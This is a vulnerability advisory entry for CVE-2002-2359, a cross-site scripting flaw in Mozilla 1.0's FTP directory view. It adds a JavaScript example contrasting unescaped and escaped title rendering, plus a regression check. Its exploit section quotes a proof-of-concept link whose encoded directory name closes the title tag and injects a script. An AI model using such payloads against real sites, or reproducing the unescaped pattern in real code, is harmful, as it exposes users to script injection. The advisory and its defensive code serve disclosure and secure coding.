Mozilla FTP View Cross-Site Scripting Vulnerability


Vulnerability ID: 1106904 Vulnerability type: Cross-site scripting
Published: 2002-08-06 Updated: 2002-12-31
CVE ID: CVE-2002-2359
CNNVD-ID: CNNVD-200212-275
Platform: Unix CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/21682
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-275
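|Vulnerability details
The FTP view feature in Mozilla 1.0 contains a cross-site scripting (XSS) vulnerability. A remote attacker can inject arbitrary web script or HTML via the title tag of an ftp URL.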
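The root cause is a decoded URL value placed inside `<title>` without HTML escaping. The JavaScript below is an added example, not Mozilla code: the function names, the page template and the host `ftp.example.org` are assumptions, and the encoded value is the one from the proof-of-concept link on this page.

```javascript
// Added illustration; function names and the page template are assumptions,
// not Mozilla source code. ftp.example.org is a placeholder host.

// Percent-encoded directory value from the proof-of-concept link on this page.
const POC_VALUE = '%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E';

// Escape the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Flawed pattern: the decoded directory name is concatenated into <title>.
function renderListingUnsafe(host, encodedDir) {
  const dir = decodeURIComponent(encodedDir);
  return `<html><head><title>Index of ftp://${host}/${dir}</title></head><body></body></html>`;
}

// Corrected pattern: every URL-derived value is escaped before insertion.
function renderListingSafe(host, encodedDir) {
  let dir;
  try {
    dir = decodeURIComponent(encodedDir);
  } catch (e) {
    dir = encodedDir; // malformed percent-escape: display the raw text instead
  }
  return `<html><head><title>Index of ftp://${escapeHtml(host)}/${escapeHtml(dir)}` +
         `</title></head><body></body></html>`;
}

// Regression check: true when the markup has anything other than exactly one
// </title> close tag, or contains a <script> start tag.
function breaksOutOfTitle(html) {
  const closes = (html.match(/<\/title\s*>/gi) || []).length;
  return closes !== 1 || /<script\b/i.test(html);
}

console.log('unsafe breaks out:', breaksOutOfTitle(renderListingUnsafe('ftp.example.org', POC_VALUE)));
console.log('safe breaks out:  ', breaksOutOfTitle(renderListingSafe('ftp.example.org', POC_VALUE)));
```

`breaksOutOfTitle` is suited to a regression test for a listing generator, so an unescaped code path fails the build instead of reaching users.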
|Exploit
source: http://www.securityfocus.com/bid/5403/info

A cross-site scripting vulnerability in Mozilla has been reported. When viewing the contents of an FTP site as web content from an ftp:// URL, the directory name is included in the HTML representation. It is not adequately sanitized before this occurs. An attacker may embed JavaScript as this value between opening and closing "<title>" tags in an FTP URL.

<a href="ftp://[FTPserver]/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>

Example:
<a href="ftp://ftp.mozilla.org/#%3C%2ftitle%3E%3Cscript%3Ealert(%22exploit%22);%3C%2fscript%3E">Exploit</a>
|References

Source: BID
Name: 5403
Link: http://www.securityfocus.com/bid/5403
Source: XF
Name: multiple-ftp-view-xss(9757)
Link: http://www.iss.net/security_center/static/9757.php
Source: bugzilla.mozilla.org
Link: http://bugzilla.mozilla.org/show_bug.cgi?id=154030
Source: VULNWATCH
Name: 20020806 Mozilla FTP View Cross-Site Scripting Vulnerability
Link: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0060.html
